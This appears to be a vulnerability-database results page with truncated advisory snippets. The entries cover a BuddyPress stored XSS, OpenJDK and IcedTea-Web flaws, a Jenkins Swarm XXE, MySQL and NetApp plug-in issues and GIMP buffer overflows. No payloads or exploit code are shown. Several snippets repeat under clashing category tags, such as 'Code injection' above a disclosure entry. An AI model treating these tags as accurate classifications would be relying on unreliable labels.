WordPress: Stored XSS on byddypress Plug-in via groups name

Hi, I found that there is a storage xss in another output group name, but this xss needs to press the key combination to trigger. Just create or modify the group information, set the group name to the following payload, and then access Group page, if you are macos need to press,...

Information Disclosure

Red Hat OpenShift Container Platform is the company's cloud computing Platform-as-a-Service PaaS solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.6.1. See the following advisory for the container imag...

Sandbox Protection Bypass

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause t...

Denial Of Service (DoS)

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause t...

Denial Of Service (DoS)

Red Hat Enterprise Linux OpenStack Platform provides the facilities for building a private or public infrastructure-as-a-service IaaS cloud running on commonly available physical hardware. This update addresses the following issues: This package rebases mariadb-galera to 5.5.42, fixing an issue...

Denial Of Service (DoS)

Red Hat Enterprise Linux OpenStack Platform provides the facilities for building a private or public infrastructure-as-a-service IaaS cloud running on commonly available physical hardware. This update addresses the following issues: This package rebases mariadb-galera to 5.5.42, fixing an issue...

Information Disclosure

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when...

Information Disclosure

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when...

Arbitrary Code Execution

The IcedTea-Web project provides a Java web browser plug-in and an implementation of Java Web Start, which is based on the Netx project. It also contains a configuration tool for managing deployment settings for the plug-in and Web Start implementations. It was discovered that the IcedTea-Web...

Denial Of Service (DoS)

The IcedTea-Web project provides a Java web browser plug-in and an implementation of Java Web Start, which is based on the Netx project. It also contains a configuration tool for managing deployment settings for the plug-in and Web Start implementations. An uninitialized pointer use flaw was foun...

Xxe

Jenkins Self-Organizing Swarm Plug-in Modules Plugin clients that use UDP broadcasts to discover Jenkins masters do not prevent XML External Entity processing when processing the responses, allowing unauthorized attackers on the same network to read arbitrary files from Swarm clients...

CVE-2019-10309

The CVE-2019-10309 entry concerns the Jenkins Swarm Plugin (Swarm Client) where UDP-based master discovery responses are XML documents that are parsed without proper XXE protection. This XXE flaw could allow an unauthenticated attacker on the same network to read arbitrary files from Swarm client...

Code injection

Element Plug-in for vCenter Server versions prior to 4.2.3 may disclose sensitive account information to an unauthenticated attacker. NetApp HCI Compute Node versions prior to 1.4P2 bundle affected versions of Element Plug-in for vCenter Server...

CVE-2019-5492

CVE-2019-5492 affects Element Plug-in for vCenter Server prior to 4.2.3, with NetApp HCI Compute Node versions prior to 1.4P2 bundle affecting the same plug-in. The vulnerability is that it may disclose sensitive account information to an unauthenticated attacker. The available connected document...

UBUNTU-CVE-2019-2566

Vulnerability in the MySQL Server component of Oracle MySQL subcomponent: Server: Audit Plug-in. Supported versions that are affected are 5.7.25 and prior and 8.0.15 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromis...

Oracle MySQL Server Access Control Error Vulnerability (CNVD-2019-16278)

Oracle MySQL is an open source relational database management system from Oracle Corporation, of which MySQL Server is a database server component. A security vulnerability exists in the MySQL Server component of Oracle MySQL, version 5.7.25 and earlier, and the Server: Audit Plug-in subcomponent...

Critical: Red Hat Security Advisory: flash-plugin security update

An update for flash-plugin is now available for Red Hat Enterprise Linux 6 Supplementary. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each...

How to Collect Logs for Veeam Plug-in for Oracle RMAN

Purpose This article documents how to collect the diagnostic information needed for a support case involving the Veeam Plug-in for Oracle RMAN. Solution 1. Collect diagnostic information as documented in the five sections below. 2. Combine the data into a single .zip file. 3. Attach the zip file ...

How to Collect Logs for Veeam Plug-in for SAP HANA

Purpose This article documents how to collect the diagnostic information needed for a support case involving the Veeam Plug-in for SAP HANA. Solution 1. Collect diagnostic information as documented in the four sections below. 2. Combine the data into a single .zip file. 3. Attach the zip file to...

Remote Code Execution (RCE)

gimp is vulnerable to remote code execution RCE attacks. The vulnerability exists due to multiple stack-based buffer overflows in file-xwd.c in the X Window Dump XWD plug-in in GIMP 2.8.2 allow remote attackers to cause a denial of service crash and possibly execute arbitrary code via a large 1...